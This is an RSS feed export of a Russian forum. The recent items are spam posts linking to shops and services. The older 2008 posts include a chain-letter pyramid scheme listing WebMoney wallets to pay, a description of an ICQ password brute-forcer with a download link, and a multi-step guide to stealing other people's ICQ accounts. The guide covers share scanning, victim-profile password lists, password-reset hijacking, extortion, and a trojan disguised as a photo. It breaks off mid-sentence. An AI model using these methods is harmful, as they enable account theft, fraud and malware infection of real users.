<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://cah.hitbb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>CAH</title>
		<link>http://cah.hitbb.ru/</link>
		<description>CAH</description>
		<language>ru-ru</language>
		<lastBuildDate>Wed, 15 Sep 2021 12:39:17 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Логические задачки для 7 лет</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=37#p37</link>
			<description>&lt;p&gt;В начале самоподготовки, когда Вы занимаетесь с первоклассником своим, берите логические задачки для 7 лет &lt;a href=&quot;https://childdevelop.ru/worksheets/2725/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://childdevelop.ru/worksheets/2725/&lt;/a&gt; - Учим месяцы и времена года. Это задание, которое поможет ребенку выучить месяцы и времена года, а также потренировать мелкую моторику, память и внимание. Рад помочь...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Wed, 15 Sep 2021 12:39:17 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=37#p37</guid>
		</item>
		<item>
			<title>Клубника в шоколаде в Москве</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=36#p36</link>
			<description>&lt;p&gt;Я на десерты обычно на столы на торжества ставлю клубника в шоколаде &lt;a href=&quot;https://www.ilikesurprises.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Это и красиво как украшение и вкусно...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Tue, 20 Jul 2021 12:24:24 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=36#p36</guid>
		</item>
		<item>
			<title>1С:Корпорация</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=35#p35</link>
			<description>&lt;p&gt;Мы работаем на 1С. Недавно автоматизировали все бизнес-процессы фармацевтической компании на этой платформы &lt;a href=&quot;https://www.assino.ru/resheniya/resheniya-1s/1s-korporatsiya/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://www.assino.ru/resheniya/resheni &amp;#8230; poratsiya/&lt;/a&gt; 1С Корпорация. Автоматизация холдингов. Облегчите себе решение ежедневных задач...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Mon, 24 May 2021 11:23:06 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=35#p35</guid>
		</item>
		<item>
			<title>Развитие ребенка</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=34#p34</link>
			<description>&lt;p&gt;Читайте так же бесплатно статьи &lt;a href=&quot;https://childdevelop.ru/articles/develop/9823/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;на сайте Развитие ребенка&lt;/a&gt; Почему умные родители печатают задания для ребенка? Задание на бумаге всегда более комплексное и помогает ребенку развивать сразу несколько важных навыков. Учитесь с удовольствием...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Wed, 19 May 2021 11:28:22 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=34#p34</guid>
		</item>
		<item>
			<title>Недвижимость</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=33#p33</link>
			<description>&lt;p&gt;Решите в Москве ремонт делать. Вот &lt;a href=&quot;https://avalremont.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; смотрите для себя Ремонт квартир в Москве, разработка дизайн проектов. Мы остались довольны...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Tue, 09 Feb 2021 14:10:18 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=33#p33</guid>
		</item>
		<item>
			<title>Работа онлайн</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=32#p32</link>
			<description>&lt;p&gt;Работаю сам на себя. Зарабатываю на ставках на спорт. &lt;a href=&quot;https://aboutbetting.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Здесь&lt;/a&gt; главное найти источник самой свежей и актуальной информации из мира ставок на спорт. все просто...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Tue, 09 Feb 2021 13:34:05 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=32#p32</guid>
		</item>
		<item>
			<title>Timb</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=30#p30</link>
			<description>&lt;p&gt;А я нашел сайт где можно приобрести уникальные корпоративные шоколадные подарки к Новому году! Вот &lt;a href=&quot;https://www.ilikesurprises.ru/korporativnye-podarki-moskva&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; посмотрите, какой полет фантазии за Ваши деньги...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Fri, 27 Nov 2020 12:58:45 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=30#p30</guid>
		</item>
		<item>
			<title>Курсы СЕО</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=29#p29</link>
			<description>&lt;p&gt;Друзья, сейчас очень много разных курсов. Особенно что касается их качества. Вот Вам пример качественного и ответственного подхода&amp;#160; по разным с направлениям: SEO, Маркетинг, Аналитика, Профессии, Продажи, Социальные сети, SMM, PR и реклама, WEB-дизайн, Систематизация и Интернет-магазин, к онлайн вебинарам и&amp;#160; бизнес академиям - &lt;a href=&quot;https://meduza.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://meduza.org/&lt;/a&gt;&amp;#160; Никогда не останавливайтесь на достигнутом...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Mon, 16 Nov 2020 12:28:13 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=29#p29</guid>
		</item>
		<item>
			<title>Рыбалка и охота на все времена</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=28#p28</link>
			<description>&lt;p&gt;Чтобы рыбалка у Вас удалась, особенно с дальним выездом. Всегда берите с собой эхолот для рыбалки и GPS навигатор, чтобы не потеряться в лесу. Мы когда едем с друзьями все &lt;a href=&quot;https://vcentrespb.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt; заказываем. Посмотрите, может что понравится.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Tue, 29 Sep 2020 13:11:33 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=28#p28</guid>
		</item>
		<item>
			<title>Мебель как она есть</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=27#p27</link>
			<description>&lt;p&gt;Друзья, ищите стеклянные фартуки для кухни под заказ? Посмотрите здесь - &lt;a href=&quot;https://dvorsky.kiev.ua/katalog/steklyannyie-fartuki/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;https://dvorsky.kiev.ua/katalog/steklyannyie-fartuki/&lt;/a&gt; Нам все подошло и по цене и качеству. Выбор большой.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Сокил Иванов)</author>
			<pubDate>Wed, 26 Aug 2020 12:09:51 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=27#p27</guid>
		</item>
		<item>
			<title>Реальный зароботок в интернете с помощью перамиды</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=21#p21</link>
			<description>&lt;p&gt;Реальный зароботок в интернете с помощью перамиды:&lt;/p&gt;
						&lt;p&gt;СНАЧАЛА Я ТОЖЕ В ЭТО НЕ ВЕРИЛ, ПОКА САМ НЕ ПОПРОБОВАЛ.&lt;/p&gt;
						&lt;p&gt;А наткнулся на это совершенно случайно.&amp;#160; Бродя, как обычно, по разного рода форумам, вдруг нахожу эту статью, в которой говорится, что&amp;#160; МОЖНО СДЕЛАТЬ ТЫСЯЧИ ДОЛЛАРОВ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 210 РУБЛЕЙ&amp;#160; (от себя скажу, что таких денег за две недели Вы явно не увидите,- это произойдёт гораздо позже).&amp;#160; В общем, там говорилось, что надо послать по 30 руб. на 7 интернет-кошельков, которые ниже перечисленны. Затем Вы вписываете номер своего&amp;#160; кошелька и закидываете данное сообщение, но уже с Вами на седьмой строчке, на 200 разных форумов. Вроде бы просто и никаких уловок. Ну я поразмышлял и подумал, что в принципе ничего не теряю кроме 210 рублей - и решил попробовать.&amp;#160; Интернет-кошелёк у меня уже был и я перечислил всем участникам акции из списка по 30 рублей, затем принялся рассылать это объявление по разным форумам. В течении 4-5 дней я зарегестрировался более, чем на 100 форумах и бесплатных досках объявлений, и стал ждать. Прошла неделя, заглядываю в свой кошелёк, а там ничего нового. Ну, плюнул я и бросил это занятие. А ещё недели через две в Интернете,&amp;#160; вдруг нашёл некий комментарий к этому проекту и вновь заглянул в кошелёк, и обнаружил там 900 рублей. Значит 30 человек подключились, но за месяц это всё-равно очень мало. Потом смотрю, а поступлений всё больше и больше, тогда я отправил&amp;#160; объявление ещё на 120 форумов. И тут началось! Деньги стали приходить каждый день и через полтора месяца на моём счету уже было более 30 тысяч рублей, а ещё через два месяца-, ну в общем на работу можно не ходить. Я долго не мог поверить, что это работает, пока не увидел&amp;#160; РЕАЛЬНЫЕ БАБКИ. Но они продолжают приходить и теперь моя работа, это&amp;#160; два-три часа в Инете!&amp;#160; А заработок такой, что мне даже и не снилось.&amp;#160; Теперь, если хотите, я расскажу вам, как это работает и самое главное- ПОЧЕМУ!&amp;#160; Если вы будете в точности соблюдать ниже-перечисленные инструкции, то будете получать&amp;#160; больше денег, чем думали, не прилагая к этому особых усилий. Согласитесь, что это просто, - не нужно покупать бесполезные программы, не нужно учить английский; эта программа основана на добросовестных платёжных отношениях между её участниками и только, где&amp;#160; Ваш вклад составляет всего 210 рублей за несколько переводов.&amp;#160; ПРАВДА, ЕСТЬ ОДНО, НО ОЧЕНЬ ВАЖНОЕ УСЛОВИЕ!!!&amp;#160; Всё это удачно работает благодаря&amp;#160; ПОРЯДОЧНОСТИ&amp;#160; И&amp;#160; ЧЕСТНОСТИ&amp;#160; участников. А ещё необходимо сделать ТРИ шага к успеху:&lt;br /&gt;1. Зарегестрируйтесь в системе&amp;#160; WebMoney Transfer, которая находится по адресу&amp;#160; wwwwebmoney.ru, потом загрузите предложенную программу WebMoney Keeper Classic, следуя инструкции, хорошенько ознакомьтесь с данной системой, как она работает.&amp;#160; Обязательно сделайте копию файла ключей на CD носителе, или флэшке. Установите рублёвый интернет-кошелёк, затем выберите оптимальный для себя вариант пополнения и внесите на свой счёт рублей 230 (карточки&amp;#160; WMR&amp;#160; обычно продаются в магазинах электроники и сотовой связи). Лично я перечисляю деньги на свой&amp;#160; WM- кошелёк в магазине &amp;quot;Эльдорадо&amp;quot;, как на мобильный телефон. Поступление средств мгновенное.&amp;#160; Почему именно 230, а не 210 рублей,-объясняю: 230 рублей это необходимый минимум, т.к. все платёжные интернет-системы за денежные операции берут хоть маленький, но процент,- да и кошелёк должен оставаться активным.&lt;br /&gt;2. Взяв номер первого кошелька из приведённого ниже списка, отправьте на него 30 рублей. Далее, начиная со второго, по аналогии отправьте по 30 руб. на остальные 6 кошельков (не забудьте вписывать в поле &amp;quot;Примечание&amp;quot; следующее:&amp;#160; &amp;quot;Пожалуйста, внесите меня в список&amp;#160; WM-кошельков&amp;quot;).&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160;1. R 401140636501&lt;br /&gt;&amp;#160; &amp;#160;2. R 979996466328&lt;br /&gt;&amp;#160; &amp;#160;3. R 284094443680&lt;br /&gt;&amp;#160; &amp;#160;4. R 369879725428&lt;br /&gt;&amp;#160; &amp;#160;5. R 337581541097&lt;br /&gt;&amp;#160; &amp;#160;6. R 134563609732&lt;br /&gt;&amp;#160; &amp;#160;7. R 356952715294&lt;/p&gt;
						&lt;p&gt;Теперь, ВНИМАНИЕ!!!&amp;#160; После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt., или ещё как Вам удобней). В скопированной статье вычеркните из списка 1-й кошелёк и переместите 2-й кошелёк на место 1-го, который Вы стёрли, тем самым переместив список на одну строку выше (7-й становится 6-м, 6-й становится 5-м и т.д.). Впишите в 7-ю строчку Ваш кошелёк!&lt;br /&gt;3. Весь остальной текст желательно не менять, так как он наиболее понятно излагает смысл. РАЗМЕСТИТЕ эту статью минимум на 200 форумах и новостных лентах (News Groups), или рассылайте по эл.почте, но запомните,- чем больше Вы разместите, тем выше будет Ваш доход, и тут всё зависит только от Вас. А ещё это будет стоить Вам&amp;#160; 210 рублей, плюс мизерный процент за переводы&amp;#160; и&amp;#160; немного работы. По мере накопления средств на Вашем кошельке не забывайте переводить их на свой банковский счёт. Все необходимые инструкции в разделе &amp;quot;Мои WebMoney&amp;quot; Вашей эл.ведомости.&lt;br /&gt;Хотя,- Вы можете купить на эти деньги две бутылки водки, выпить её, а утром с тяжёлой головой пойти на работу и снова &amp;quot;вкалывать&amp;quot; на стройке, как я до недавнего времени.&amp;#160; Или ещё где-то; дело Ваше. А можно отнестись к этому серьёзно и, приложив некоторые усилия, а главное - ЧЕСТНОСТЬ, зарабатывать хорошие средства;&amp;#160; решать только Вам!&amp;#160; Ну вот, собственно и всё. &lt;br /&gt;Желаю всем удачи!!!&lt;/p&gt;</description>
			<author>mybb@mybb.ru (василич)</author>
			<pubDate>Thu, 20 Nov 2008 17:43:56 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=21#p21</guid>
		</item>
		<item>
			<title>14 способов как угнать ICQ номер</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=20#p20</link>
			<description>&lt;p&gt;Разве тут все способы сложные ? Можно подобрать пароль к аське но время подбора будет зависить от сложности пароля и скорости перебора.. Может занять 5 минут, а может и месяцы.. Самые актуальные способы сейчас, это троян и брут (перебор пароля)...&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Wed, 12 Nov 2008 20:26:20 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=20#p20</guid>
		</item>
		<item>
			<title>Справочник новичка</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=18#p18</link>
			<description>&lt;p&gt;&lt;span style=&quot;color: red&quot;&gt;1. Что такое UIN ?&lt;/span&gt;&lt;br /&gt;В ICQ расшифровка UIN - Universal Internet Number. Дословно - универсальный интернет-номер. У каждого пользователя есть свой номер, по котрому он входит в систему (как почтовый адрес) и по которому его могут найти другие пользователи и он сам может найти других.&lt;br /&gt;Можно сообщать свой ICQ UIN в визитках и в подписях в электронных письмах, чтобы корреспонденты могли выйти быстро на связь.&lt;br /&gt;Также можно расшифровать UIN как User Identification Number - идентификационный номер пользователя. Смысл по большому счету тот же.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;2. Что такое Дедик ?&lt;/span&gt;&lt;br /&gt;Дедик - очевидно, пошло от английского слова &amp;quot;dedicated&amp;quot;, что с англиского значит выделенный. То есть Dedicated Server - выделенный сервер. Дедики, как их принято называть, на которых имеются довольно мощные сетевые интерфейсы, каналы и довольно не слабая аппаратная конфигурация &lt;br /&gt;служат для обработки данных, а также для хранения баз данных или любого другого материала находящегося на них для обслуживания персонала, фирмы или организации.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;3. Что такое Брут ?&lt;/span&gt;&lt;br /&gt;Брут Brute Или Брутфорс - это перебор поролей.. Есть 2 способа перебора, пепреберать 1 пароль на базу пользывателей. Или Переберать базу поролей на одного пользывателя.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;4. Что такое Троян ?&lt;/span&gt;&lt;br /&gt;Это программа, которая как правило выдает себя за что-нибудь мирное и чрезвычайно полезное. Интернет-трояны - программы которые либо дают доступ к компьютеру с другого компа без ведома пользователя (BackDoor), либо высылают по определенному адресу какую-либо информацию с компьютера-жертвы (Trojan.PSW)&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;5. Что такое Вирус ?&lt;/span&gt;&lt;br /&gt;Компьютерные вирусы — это программы, которые мешают нормальной работе компьютера, перезаписывают, повреждают или удаляют данные. Они также распространяются между компьютерами в сети и через Интернет, часто замедляя их работу и вызывая другие неполадки.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;6. Что такое компьютерный червь ?&lt;/span&gt;&lt;br /&gt;Компьютерный червь. Это тип вредоносных или как их еще называют – злоумышленных программ. Такие виртуальные черви появились уже давно, наряду с вирусами и шпионскими программами. Компьютерный червь похож на вирус, потому что он попадает в компьютер, прикрепленный к файлу. Но в отличие от вируса, червь имеет свойство воспроизводить себя в вашем компьютере, не требуя каких-либо действий пользователей. Еще одной особенностью компьютерного червя является то, что он распространяется не только по всей области вашего компьютера, но и автоматически рассылает свои копии по электронной почте или другим средствам связи компьютеров между собой.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;7. Что такое Драйвер ?&lt;/span&gt;&lt;br /&gt;За управление аппаратными устройствами компьютера (процессором, памятью, дисководами и устройствами ввода-вывода) отвечают служебные программы - операционная система и драйверы (driver). Драйвер &amp;quot;переводит&amp;quot; команды ОС в конкретные команды, понятные устройству.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;8. Что такое Домен ?&lt;/span&gt;&lt;br /&gt;Доменное имя – это уникальное имя, которое вы выбираете для Вашего веб сайта. Веб сайты идентифицируются в сети Интернет по имени и цифровому IP адресу.&lt;br /&gt;На следующем примере мы постараемся объяснить разницу между ссылкой и доменным именем.&lt;br /&gt;URL:http://www.something.com/index.html&lt;br /&gt;Домен: wwwsomething.com&lt;br /&gt;Зарегистрированное доменное имя: something.com&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;9. Что такое Хост&lt;/span&gt;&lt;br /&gt;Хостом в сети Internet называются компьютеры, работающие в многозадачной операционной системе (Unix, VMS), поддерживающие протоколы TCP\IP и предоставляющие пользователям какие-либо сетевые услуги.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;10. Что такое Unix\Lunix ?&lt;/span&gt;&lt;br /&gt;Linux - это Unix-подобная (или POSIX-совместимая) операционная система, многопользовательская и многозадачная, распространяемая открыто и свободно.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;11. Что такое Операционная система ?&lt;/span&gt;&lt;br /&gt;Ещё часто называют просто: Ось.. Это программа, управляющая аппаратными и программными средствами компьютера, которые предназначены для выполнения задач пользователя.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;12. Что такое TCP\IP&lt;/span&gt;&lt;br /&gt;TCP/IP (Transmission Control Protocol/Internet Protocol - протокол управления передачей/межсетевой протокол) - базовый протокол Internet, позволяющий обмениваться данными компьютерам, работающим под управлением различных операционных систем. Вообще-то TCP/IP представляет собой целый набор протоколов, но обычно говорят об одном протоколе под общим названием TCP/IP.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;13. Что такое Спам ?&lt;/span&gt;&lt;br /&gt;Массовая рассылка сообщений посредством электронной почты и других средств персонального обмена информацией (включая службы немедленной доставки сообщений, такие как SMS, IRC и т.п.), иначе как по явно и недвусмысленно выраженной инициативе получателей.&lt;br /&gt;Открытая публикация адреса электронной почты или другой системы персонального обмена информацией не может служить основанием для включения адреса в какой-либо список для массовой рассылки сообщений. Включение адреса, полученного любым путем (через веб-форму, через подписного робота и т.п.), в список адресов, по которому проводится какая-либо рассылка, допускается только при условии наличия надлежащей технической процедуры подтверждения подписки, гарантирующей, что адрес не попадет в список иначе, как по воле владельца адреса. Процедура подтверждения подписки должна исключать возможность попадания адреса в список адресатов какой-либо рассылки (единичной или регулярной) по инициативе третьих лиц (т.е. лиц, не являющихся владельцами данного адреса).&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;14. Что такое Флуд ?&lt;/span&gt;&lt;br /&gt;Флуд, правильно: флад (от англ. flood — наводнение) — пустословие, сообщения в интернет-форумах и чатах, занимающие (во многих случаях) большие объёмы и не несущие никакой-либо информации или очень малое количество полезной информации.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;15. Что такое Троллинг ?&lt;/span&gt;&lt;br /&gt;(от англ. trolling) — размещение в Интернете (на форумах, в группах новостей Usenet, в вики-проектах и др.) провокационных сообщений с целью вызвать флейм, конфликты между участниками, оскорбления, войну правок и т. п.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;16. Кто такой Хакер ?&lt;/span&gt;&lt;br /&gt;ХАКЕР — квалифицированный компьютерный взломщик, злоумышленник, специализирующийся на поиске и использовании несанкционированного доступа в вычислительные сети или другое компьютеризированное оборудование для незаконного получения информации, извлечения выгоды, нанесения ущерба.&lt;br /&gt;&lt;span style=&quot;color: red&quot;&gt;17. Что такое Руткит ?&lt;/span&gt;&lt;br /&gt;Руткит (Rootkit) - Специальные хакерские программы, которые не видны ни антивирусам, ни операционной системе, а потому очень опасны.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Thu, 30 Oct 2008 14:58:38 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=18#p18</guid>
		</item>
		<item>
			<title>Программы для Брута</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=17#p17</link>
			<description>&lt;p&gt;&lt;strong&gt;&lt;span style=&quot;color: red&quot;&gt;SBrute&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;&lt;span style=&quot;color: black&quot;&gt;Simple Brute&lt;/span&gt;&lt;br /&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://img179.imageshack.us/img179/761/sbrute2kg6.png&quot; alt=&quot;http://img179.imageshack.us/img179/761/sbrute2kg6.png&quot; /&gt;&lt;br /&gt;Это небольшой icq-брутфорсер, работает без проксей (что предполагает невысокую скорость) работает со списком уин;пас.&lt;br /&gt;В папке с брутом должно лежать 4 файла:&lt;br /&gt;&amp;#160; -source.txt - пары уин;пароль для брута&lt;br /&gt;&amp;#160; -bad.txt – номера с неверными паролями&lt;br /&gt;&amp;#160; -good.txt – сбрученные номера&lt;br /&gt;&amp;#160; -cfg.txt – настройки&lt;/p&gt;
						&lt;p&gt;Добавлена смена пароля на случайный при &amp;quot;сбручивание&amp;quot; номера.&lt;br /&gt;Для включения/выключения опции отредактируйте cfg.txt в папке с брутом.&lt;br /&gt;Вместо &amp;quot;x&amp;quot; укажите нужное значение:&lt;br /&gt;0 - отключить смену пароля&lt;br /&gt;1 - включить смену пароля&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;&amp;lt;options&amp;gt;&lt;br /&gt;&amp;lt;change_passwords&amp;gt;х&amp;lt;/change_passwords&amp;gt;&lt;br /&gt;&amp;lt;/options&amp;gt;&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;Настройки загружаются при старте, поэтому изменения в файле без перезапуска программы нечего не дадут.&lt;br /&gt;При включенной опции смены пароля в good.txt сохраняется таким образом:&lt;/p&gt;&lt;div class=&quot;quote-box quote-main&quot;&gt;&lt;blockquote&gt;&lt;p&gt;уин;новый_пароль;старый_пароль&lt;/p&gt;&lt;/blockquote&gt;&lt;/div&gt;&lt;p&gt;&lt;a href=&quot;http://grabberz.com.ua/release/Sbrute.rar&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;Скачать&lt;/strong&gt;&lt;span style=&quot;color: gray&quot;&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;color: silver&quot;&gt;Автор: Astako&lt;/span&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (AfeR)</author>
			<pubDate>Thu, 30 Oct 2008 14:12:13 +0300</pubDate>
			<guid>http://cah.hitbb.ru/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>Ещё про угон ICQ</title>
			<link>http://cah.hitbb.ru/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Угон ICQ уинов&amp;#160; &amp;#160;Вот бывает иногда что хочется именно ЕЁ ;-) Только эту асю я хочу... Вот для таких случаев несколько способом поиметь именно ту, о которой вы всегда мечтали. &lt;/p&gt;
						&lt;p&gt;I. Способ куль-хацкерский. Вы добавляете юзера с нужным уином в контакт. Смотрите его IP. Чтобы его увидеть необходимо, чтобы у того пользователя стояло разрешение на установление прямых IP соединений с другими пользователями ICQ. А чтобы IP начал показыватся в User Details&#039;ах качаем и устанавлием патч для icq 2003 build 3916 от ven000m&#039;a (wwwven000m.net). Затем берете программу ip2uin, указываете ей айпи и она просканит на запущенность аси. Потом попытаеся присоединиться к удаленному компу по открытому порту. которая она будет сканировать, в указанном вами диапазоне. Процент на это 1 из 100, при уловии что на удаленном компьютере не запущен никакой FireWall. Если сработало, то забираете уин и вопрос считаем исчерпанным :). Если не удался (скорее всего), берете любой сетевой сканер и сканируете на расшаренные реусурсы. Процент попадания около 10 из 100. Если сработало, то из папки аси вырываете все .dat файлы (вид: uin.dat, типа 111222.dat, 843092.dat итд) и к себе а винт в папку с установленной асей. Потом берем программу расшифровки dat-файла и уин у вас в кармане. &lt;/p&gt;
						&lt;p&gt;II. Способ женский + научный. Юзера опять в контакты. Затем открываем профиль юзера и открываем блокнот (notepad). И все слова из профиля, вроде ника, имени, фамилии, страны, города, адреса и всяческих комбинаций этого дела вносим через enter в тектовый файл. Затем смотрим мыло. Идем в яндекс или гугл и ищем это мыло. Скорее всего вы найдете много информации на всяких форумах, домашних страничках. Всю информацию в текстовый файл (не прямым текстом :D, а отдельные слова до 8-ми символов включительно). Также можно войти с ним в контакт, познакомиться из того, что он вам расскажет добавить слов. А в идеале, если у вас есть какой-нить форум или чат или что-то такое, где надо регистрироваться, ЗАСТАВЬТЕ его там зарегаться. Тогда он оставит там пароль. А люди как правило используют один и тот же пароль везде. Так что на 90% он ваш. По-любому, добавьте этот пароль в словарь. И добавьте туда этот юин (в смысле, ко всем вашим паролям добавьте юин, т.к. многие пользователи ставят пароль такой же как юин). За 10-30 минут &#039;работы&#039; у вас должен получиться список слов эдак на 100-400. Потом добавьте туда пару десятков просто общеупотребляемых слов, вроде sex, rock, metal, city, qwerty, asdfg и все в этом роде. После этого брутим (ниже) на эти пассы. Если юин у вас, то все свободны :). Если нет, то способ следующий. &lt;/p&gt;
						&lt;p&gt;III. Способ мыльница. Работает, только если у юзера есть мыло (e-mail). Смотрим в профиле юзера, есть-ли основное мыло. Если есть, то читаем. Смотрим внимательно на мыло. Если оно вида &#039;хрен_знает_что.какой-нить_известный_бесплатный_мыльный_домен&#039;, то нам повезло. Шанс на это 1 из 500. Например, если мыло fsdlhfslfhlsjghlp@yandex.ru. Тогда скорее всего этого мыла в действительности не существует. Если это так, идем на этот сервак (в нашем случае, яндекс.ру) и регистрируем это мыло. Идем сюда и говорим что пароль бы нам надо получить. Указываем наш юин и ваше только что созданное мыло и жмем заветную кнопку. Через минуту у вас в ящике должен лежать пароль. Если все ок и юин ваш, до свидания :). &lt;/p&gt;
						&lt;p&gt;IV. Способ паяльник. Берем из раздела &#039;программы&#039; или здесь V-ListMakeR, при помощи него создаем словарик метров эдак на 40. Хотя лучше взять просто обычный словарь в электронном виде. Создаем при мощи этой же проги файл типа Uin;pass и суем его в IPDBrute. И если повезет, то через пару суток вы взломаете эту асю ;-) &lt;/p&gt;
						&lt;p&gt;V. Способ страшный. Тут все просто. Добавляем юзера в контакт и пишем ему открытым текстом на всех доступных языках: мне нужен твой юин, меняю на другой 6-знак. Я могу спокойно сломать вашу асю, но мне этого не хочется. Так что у вас 3 дня подумать. И предлагайте юин покрасивше. Потом меняете. &lt;/p&gt;
						&lt;p&gt;VI. Способ спам. Опять же, только если у выбранного вами уина есть primary e-mail. Берем програмку для отправки писем с чужого адреса. А теперь с его адреса рассылаем кучу спама через smtp сервер его мыла. И идем жаловаться в суппорт сервера, на котором его мыло. Жалуемся, жалуемся, а потом его отрыбают и регистрируем мыло на себя ;-) &lt;/p&gt;
						&lt;p&gt;VII. Троян. Что тут можно сказать. Все что Вам нужно - это хороший троян + немного смекалки. Трой не обязательно должен не ловиться антивирусом. Как Вы думаете, какой процент того что у данного юзера стоит антивирус, тем более обновленный если всего пользователей в Мире около 295 миллионов, а &#039;защищенных&#039; из них 17.750.000 я думаю всего 16% приблизительно . Если он все же стоит, тогда придется применять не этот метод или искать троян которого не ловит антивирус. Допустим антивируса нету ...что делаем? Не сразу же кидать троя. Придется уговаривать. Как это сделать? Скажите, что посылаете прикольную фотку. Но если мы пошлем ему троя, он же сразу увидит расширение *.exe. Поэтому делаем следующее: берем сервак трояна, допустим под названием &#039;server.exe&#039; и переделываем его следующим образом: Вместо server пишем photo, но как быть с расширением? После слова photo, ставим точку, и пишем расширение jpg, а потом ставим кучу пробелов, то есть получается &lt;/p&gt;
